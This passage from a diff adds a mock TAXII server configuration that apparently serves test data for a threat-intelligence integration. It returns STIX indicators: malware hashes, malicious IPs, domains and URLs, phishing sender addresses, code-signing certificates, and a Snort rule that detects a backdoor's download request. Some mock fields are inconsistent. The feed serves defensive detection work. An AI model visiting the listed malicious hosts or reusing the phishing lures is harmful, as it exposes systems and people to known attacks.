dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:38.000Z", + "modified": "2023-10-19T02:00:38.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is present.", + "pattern": "[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'MD5'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:38Z", + "valid_until": "2023-10-21T02:00:38Z", + "labels": [ + "malicious-activity" + ] + }, + { + "id": "indicator--d491c790-d875-47d7-97fd-5ca2a7a1b2bc", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:38.000Z", + "modified": "2023-10-19T02:00:38.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "description": "Each of these file hashes indicates that a variant of JS/Agent.PHC trojan is present.", + "pattern": "[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'MD5'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:38Z", + "valid_until": "2023-10-21T02:00:38Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOVQwMDowNjozNy4xMzcwNjQrMDA6MDB8aW5kaWNhdG9yLS1kNDkxYzc5MC1kODc1LTQ3ZDctOTdmZC01Y2EyYTdhMWIyYmM=" + } + # IP + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/baaed2a92335418aa753fe944e13c23a/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/baaed2a92335418aa753fe944e13c23a/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:20:06.000Z", + "modified": "2023-10-19T02:20:06.000Z", + "name": "5.2.75.227", + "description": "Web services scanning and attacks", + "pattern": "[ipv4-addr:value='5.2.75.227']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:20:06Z", + "valid_until": "2023-10-21T02:20:06Z", + "labels": [ + "malicious-activity" + ] + }, + { + "id": "indicator--4cef7e20-7e22-41b9-97cc-33ce021c4e94", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:20:06.000Z", + "modified": "2023-10-19T02:20:06.000Z", + "name": "5.2.75.227", + "description": "Web services scanning and attacks", + "pattern": "[ipv4-addr:value='5.2.75.227']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:20:06Z", + "valid_until": "2023-10-21T02:20:06Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOVQwMDoyMDoxMS44OTIyMzYrMDA6MDB8aW5kaWNhdG9yLS00Y2VmN2UyMC03ZTIyLTQxYjktOTdjYy0zM2NlMDIxYzRlOTQ=" + } + # MISP + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/97e3eb74ae5f46dd9e22f677a6938ee7/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/97e3eb74ae5f46dd9e22f677a6938ee7/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "created": "2024-01-15T17:05:32.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--24fda7c8-a33c-4350-ba3f-495c887b9fe2", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2024-01-15T17:05:32.000Z", + "pattern": "[x509-certificate:hashes.MD5 = 'ed8893f16d887956e6a8a433645655fc' AND x509-certificate:hashes.SHA1 = '1ce0c3a55850c7e3f6b904b73e856e414b8293d1' AND x509-certificate:hashes.SHA256 = 'f62a815522470f8c12fac55510d367359f56aaadb530f63520df6c21a6c3c00a' AND x509-certificate:issuer = 'C=US, O=DigiCert\\\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1' AND x509-certificate:serial_number = '0187a16b5e3a704b7fcab2598f50005a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = '??=Private Organization, ??=CN, ??=, ??=, serialNumber=91370211065081921M, C=CN, ST=, L=, O=, CN=' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2022-11-29 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-29 00:00:00+00:00']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2024-01-15T17:05:32Z" + }, + { + "id": "indicator--00c84e90-4e2b-41a5-97e8-0b5f40cce015", + "type": "indicator", + "spec_version": "2.1", + "created": "2024-03-14T18:52:26.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2024-03-14T18:52:26.000Z", + "pattern": "[x509-certificate:hashes.MD5 = '4ede38dcb043138971c429eaaa2d4696' AND x509-certificate:hashes.SHA1 = '28f9a8e7601f5338bf6e194151a718608c0124a8' AND x509-certificate:hashes.SHA256 = '23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '0139dde119bb320dfb9f5defe3f71245' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Seoul, O=Hangil IT Co.\\\\\\\\, Ltd, CN=Hangil IT Co.\\\\\\\\, Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-11-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-10 00:00:00+00:00']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2024-03-14T18:52:26Z" + }, + { + "created": "2023-11-17T19:00:49.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--16425bff-e5ba-4096-8883-0b340e892c45", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-11-17T19:00:49.000Z", + "pattern": "[x509-certificate:hashes.MD5 = '8ad6881721a82127b46fd5d07a1fab4b' AND x509-certificate:hashes.SHA1 = '9ebf592dd04da5274f1db1da41ab1434dd4c6aa1' AND x509-certificate:hashes.SHA256 = 'd3afddb5c8287ad7caf8bfe1dcc6be0cb4242f765ca9ee838c133736da43b324' AND x509-certificate:issuer = 'C=US, ST=Texas, L=Houston, O=SSL Corp, CN=SSL.com EV Code Signing Intermediate CA RSA R3' AND x509-certificate:serial_number = '47f49de6c7e29352e9f0775f68e15d8b' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'C=US, ST=North Carolina, L=Asheville, O=Level Software\\\\\\\\, Inc., OU=Information Security, serialNumber=7647497, CN=Level Software\\\\\\\\, Inc., ??=Private Organization, ??=Delaware, ??=US' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-09-19 11:51:47+00:00' AND x509-certificate:validity_not_before = '2022-09-20 11:51:47+00:00']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-11-17T19:00:49Z" + }, + { + "created": "2023-11-01T04:41:36.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--fe5a0018-b2dc-4102-a100-4632efc58ab4", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "Network activity" + } + ], + "labels": [ + "misp:type=\"snort\"", + "misp:category=\"Network activity\"" + ], + "modified": "2023-11-01T04:41:36.000Z", + "pattern": "[alert tcp any any -> any 80 \\\r\n (msg:\"Matches HTTP GET request by NSPX30's orchestrator when obtaining the backdoor.\"; gid:45534554; sid:45030002; rev:1;\\\r\n metadata: author \"ESET Research\", date \"2023-10-31\", hash \"82295E138E89F37DD0E51B1723775CBE33D26475\",\\\r\n copyright \"ESET Research\", distribution \"Distribution is forbidden. Do not upload to any multi-scanner or share on any threat intel platform.\";\\\r\n content: \"GET /id=\"; content: \"User-Agent: Mozilla/4.0 (compatible\\;MSIE 5.0\\; Windows 98)|0d 0a|Host: www.baidu.com|0d 0a|\";)]", + "pattern_type": "snort", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-11-01T04:41:36Z" + }, + { + "created": "2023-09-29T09:12:42.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--561b64fa-5223-46f9-8f6c-75cafe96b97b", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"domain-ip\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T09:12:42.000Z", + "pattern": "[domain-name:value = 'acertab.info']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-14T11:39:37Z" + }, + { + "created": "2023-09-29T08:48:51.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--f8452e88-655f-4b5e-9812-2a1b3f5607cf", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:48:51.000Z", + "pattern": "[x509-certificate:hashes.MD5 = 'ef36b08d59b9a6b2f538c1d24967fa23' AND x509-certificate:hashes.SHA1 = '0cd26ef0b232e6ed9910733e1d175a80a083aa08' AND x509-certificate:hashes.SHA256 = 'e4e82449c6a99740cd80fcc0368c93986bb3645fb6a9bfdae03e5d28ac4a66d8' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '3bd92ce9987095f74623d7c37e8d344e' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=GB, ST=London, O=GREATIV LIMITED, CN=GREATIV LIMITED' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-05-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-05-10 00:00:00+00:00']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-29T08:48:51Z" + }, + { + "created": "2023-09-29T09:00:06.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--79d1df7c-8830-462d-bdf7-cea8a3911a01", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T09:00:06.000Z", + "pattern": "[file:hashes.MD5 = 'd7519b822434fb89fb3643bc2f450e23' AND file:hashes.SHA1 = '4fcf10a8fe9db80c3eaf172636a602f95b64b0fc' AND file:hashes.SHA256 = '732cfacaafe15f55c177d929eeb4b129dc5a44ce04c8d6d83da236d74c50979f']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-28T14:40:01Z" + }, + { + "created": "2023-09-29T09:00:10.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--d37cf6ca-e31f-421f-a7e0-4d1e48ba37d1", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T09:00:10.000Z", + "pattern": "[file:hashes.MD5 = '36b06d73347fe0da8177bd212e2b3f77' AND file:hashes.SHA1 = 'f1fc033763b931a729b9da3eb29a0724fd3eb6b9' AND file:hashes.SHA256 = 'a2f68aacf94a11678abd24039f1a26c65c257c26ac7c31c87b442fbd7f6583d9' AND file:name = 'fghsd.bat']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-28T19:07:41Z" + }, + { + "created": "2023-09-29T08:48:42.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:48:42.000Z", + "pattern": "[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-26T07:00:04Z" + }, + { + "created": "2023-09-29T08:48:47.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--f43fd42c-52d6-432e-a540-71cdc0f46cd9", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:48:47.000Z", + "pattern": "[file:hashes.MD5 = 'b8ef6fbfda87b44d969f338b958b2257' AND file:hashes.SHA1 = 'a85c7e14848013efb20469b35e8b70f1e447d54f' AND file:hashes.SHA256 = '354657aa58efe1da26989ef4182916cce77b0367d3a136f2b53b23edf239ff14' AND file:name = 'kafil.exe' AND file:extensions.'windows-pebinary-ext'.imphash = 'd6fe0b6872f80fca2efdb7ab10124297' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-18 05:12:45+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '1533427735186cdf43ffb09e53cfe0072393c3651791301e6723957100d481e3']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-19T12:07:09Z" + }, + { + "created": "2023-09-29T08:48:51.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--e35b97a0-a1a2-4362-bcb5-6ba7923be65a", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:48:51.000Z", + "pattern": "[file:hashes.MD5 = '2995a24f6bb7eef7824a5e309fbb3443' AND file:hashes.SHA1 = 'bd1dc1b52d55c6b236b1c768353666be962109a6' AND file:hashes.SHA256 = '5043d5af8b887cd73cbd016844514b945c31131714cf662c03ae8f229ef92981' AND file:name = 'Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:parent_directory_ref.path = 'Letter Outward No 1514' AND file:x_misp_fullpath = 'Letter Outward No 1514/Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-11 07:50:16+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '01a392201f4c58b1fc3630669ed269df858ec78a6fe1050fb24d32b1b33bd58c']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-14T11:39:37Z" + }, + { + "created": "2023-09-29T08:59:10.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--9ddd947c-bd18-479f-a8c1-2cb9e6b94f59", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:59:10.000Z", + "pattern": "[file:hashes.MD5 = '7c3c16981350845838d6f69f50568434' AND file:hashes.SHA1 = 'afcc824bd83676badd5712dbfac1c61468480d54' AND file:hashes.SHA256 = '1a27ffd32ba6f4d08a95105be3f2caee6245fe427e0b534e07f446881296b99e' AND file:name = 'as.dll' AND file:extensions.'windows-pebinary-ext'.imphash = '7e40594946c0c9f8153242b822cd655e' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 06:59:18+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '2b01fca027096cda8ed7f168621a9ee485eef04cf7e9099590d97e798d1e165a']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-25T08:02:07Z" + }, + { + "created": "2023-09-29T08:59:50.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--5bfb70d8-69b0-49a8-aaf5-3fcd9a59b41a", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:59:50.000Z", + "pattern": "[file:hashes.MD5 = 'f4671beb11a28846a53f81ac1ba333e4' AND file:hashes.SHA1 = '3c4efa52fcfa42f0dccaee70cec7462811fb7b06' AND file:hashes.SHA256 = 'e130d70679e8ac82383d7a2d2e0faaf799d394a39c4df87f955f5da590fd6605' AND file:name = 'PassCat.exe' AND file:extensions.'windows-pebinary-ext'.imphash = '9dab9f23fae6ad65306a199dde7e7b03' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-05 11:47:35+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'f12714cb47ff720487d41c8edb874ddf9ccffc5baa9b36d6d54bb6ea8b70e5d4']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-07T09:01:06Z" + }, + { + "created": "2023-10-03T13:20:09.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--c2d3ca78-8832-4f2c-a770-59184731baf5", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"domain-ip\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-03T13:20:09.000Z", + "pattern": "[domain-name:value = 'anguisbi.ru']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-07T06:13:58Z" + }, + { + "created": "2023-10-03T13:20:52.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--fd162f17-3d98-4129-9574-06ecdf733f6f", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"url\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-03T13:20:52.000Z", + "pattern": "[url:value = 'http://134.209.223.199' AND url:x_misp_scheme = 'http' AND url:x_misp_port = '80']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-08T06:31:14Z" + }, + { + "created": "2023-10-03T11:49:09.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--cdc79d14-87bc-4011-b371-55fef054e1bd", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-03T11:49:09.000Z", + "pattern": "[file:hashes.MD5 = '376002acdf350488c4a3cb5c75e8bbf1' AND file:hashes.SHA1 = '654f86929a79700157f1ea10db4abe2d3e2be4e9' AND file:hashes.SHA256 = '460ebe2c3f45cac68a485f80cf3d33e08301df0e7d0f17fe3943debe512a0583' AND file:extensions.'windows-pebinary-ext'.imphash = '318afb7c57acecbbf5ad0df6b8baf133' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2010-11-08 12:27:29+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'dbb3f575e62986974e9e20cbe57226f73f630fb59d547b99d37ca0bcc247d33b' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oleg N. Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = '7z Setup SFX (x86)' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00a9 2005-2010 Oleg N. Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = '7-Zip SFX' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = '7ZSfxMod_x86.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = '7ZSfxMod' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '000004b0']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-27T05:34:03Z" + }, + { + "created": "2023-09-29T19:44:05.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--8ea4a915-b7d5-448c-91f9-1f328102f800", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "Network activity" + } + ], + "labels": [ + "misp:type=\"email-dst\"", + "misp:category=\"Network activity\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T19:44:05.000Z", + "pattern": "[email-message:to_refs[*].value = 'joannburke1987@portugalmail.pt']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-29T19:44:05Z" + }, + { + "created": "2023-09-29T17:58:54.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--f89cd8e8-3dfa-4157-bb4d-33ee9d7e054c", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"email\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T17:58:54.000Z", + "pattern": "[email-message:from_ref.value = 'katecohen1984@portugalmail.pt' AND email-message:subject = 'Hackers Leak Explicit Photos of More Than 100 Government workers']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-29T00:00:00Z" + }, + { + "created": "2023-10-02T07:41:04.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--d9a10671-eb84-4039-8211-277c14104b39", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"url\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T07:41:04.000Z", + "pattern": "[url:value = 'https://microsoft-update-com.github.io/kb5021042/' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/kb5021042/' AND url:x_misp_port = '443']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-28T00:00:00Z" + }, + { + "created": "2023-10-02T07:58:05.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--696f64c3-733b-4cba-8757-e0cb99142ffa", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"email\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T07:58:05.000Z", + "pattern": "[email-message:x_misp_return_path = 'rosalawson1960@portugalmail.pt']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-10-02T07:58:05Z" + }, + { + "created": "2023-10-03T08:15:57.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--a444021f-5c0a-4b59-a7af-c451edf05c2f", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-03T08:15:57.000Z", + "pattern": "[file:hashes.MD5 = '8a4c807caea1cd9d3552bed916320ee6' AND file:hashes.SHA1 = '5438e26e5f7d819ef4fcd39b84e575f4c452f234' AND file:hashes.SHA256 = '06e9dd33655ebc062a4236f2611403688baf0711b5a02acc45216ae853fad607' AND file:name = 'install-kb-5021042.cmd']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-29T10:46:00Z" + }, + { + "created": "2023-10-02T13:48:17.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--8444ce6b-3c9e-4363-819a-5f64a238bcc7", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"domain-ip\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T13:48:17.000Z", + "pattern": 